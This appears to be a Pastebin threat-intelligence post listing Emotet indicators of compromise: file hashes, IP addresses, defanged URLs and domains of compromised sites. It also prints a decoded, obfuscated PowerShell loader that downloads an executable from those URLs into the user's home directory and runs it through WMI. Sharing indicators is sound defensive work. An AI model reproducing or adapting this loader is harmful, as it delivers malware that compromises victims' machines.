Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Emotet #Docs #malware #OSINT #IOC
- SHA256:
- 092fb8ce8a290c30630339fea8ac407a76fcd39e31a62aef7b4d0c917b31da5e
- 220c19f5b011876c257bc3e3e48c3b032be339e535a8e93b564bfbe65ea86610
- 220c19f5b011876c257bc3e3e48c3b032be339e535a8e93b564bfbe65ea86610
- 93edcc5c13cef6e563c7c530cf9462e92dd1c80495800814540c045a9fc2cabf
- IPs:
- 104.18.63.171
- 104.28.18.90
- 104.28.22.149
- 104.28.23.149
- 104.28.6.70
- 104.28.7.70
- 141.98.10.47
- 172.67.132.92
- 172.67.133.164
- 172.67.180.161
- 35.213.176.43
- URLs:
- hxxps://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/
- hxxps://homewatchamelia.com/wp-admin/qmK/
- hxxps://seramporemunicipality.org/replacement-vin/Ql4R/
- hxxps://imperfectdream.com/wp-content/xb2csjPW6/
- hxxps://mayxaycafe.net/wp-includes/UxdWFzYQj/
- hxxps://420extracts.ca/cgi-bin/Ecv/
- hxxps://casinopalacett.com/wp-admin/voZDArg/
- Domains:
- enjoymylifecheryl.com
- homewatchamelia.com
- seramporemunicipality.org
- imperfectdream.com
- mayxaycafe.net
- 420extracts.ca
- casinopalacett.com
- Decoded Base64 Powershell:
- <���^, $8P4vcu = [tyPe]"{5}{2}{0}{3}{1}{4}" -f M.i,O,yste,O.dIrect,Ry,S ;
- SeT LsV0 [tYpe]"{5}{0}{3}{1}{2}{4}{6}" -F.NE,V,IcEp,T.SeR,oInTmAnAG,sYSTeM,er ;
- $Rlrkjnw=Qr1ru9y;
- $D7qz32b=$Wa6rea4 [char]64 $Dehv673;
- $O5aqk3g=Xa7q3h0;
- dIr VARiAble:8P4Vcu.valuE::"cre`ATeD`IReCT`oRY"$HOME {0}Nscs8ry{0}S9t4g_l{0} -F [CHAr]92;
- $Ga8ff5s=Nffefbg;
- $lSv0::"sE`cU`Rit`yProToCOl" = Tls12;
- $Ru818ii=Vzvdenv;
- $G9po_gt = Epl6_wa2m;
- $Yfwba66=Thli7b3;
- $Irioufu=Y22l3ct;
- $Llo6n_w=$HOME{0}Nscs8ry{0}S9t4g_l{0} -F [ChAR]92$G9po_gt.exe;
- $Jvjds4y=G_wnx9u;
- $H5xr5lm=.new-object nEt.webcLIENt;
- $Mmo41vn=hxxps://enjoymylifecheryl.com/wp-includes/FPNxoUiCz3/
- hxxps://homewatchamelia.com/wp-admin/qmK/
- hxxps://seramporemunicipality.org/replacement-vin/Ql4R/
- hxxps://imperfectdream.com/wp-content/xb2csjPW6/
- hxxps://mayxaycafe.net/wp-includes/UxdWFzYQj/
- hxxps://420extracts.ca/cgi-bin/Ecv/
- hxxps://casinopalacett.com/wp-admin/voZDArg/."r`EP`Lace"/,[array]/,xwe[0]."sPl`It"$Chkut94 $D7qz32b $Opdketn;
- $Rf7k3zk=Usfuthv;
- foreach $Uhbkd7k in $Mmo41vn{try{$H5xr5lm."dO`wnl`Oa`DfIlE"$Uhbkd7k, $Llo6n_w;
- $Fsiu4_x=Urtdzox;
- If .Get-Item $Llo6n_w."Len`GTh" -ge 44263 {[wmiclass]win32_Process."Cre`A`Te"$Llo6n_w;
- $Yzrcjro=T2a4ijn;
- break;
- $Ccwk57z=Lslfh6p}}catch{}}$L9wtd00=Vxbiwxu
Advertisement
Add Comment
Please, Sign In to add comment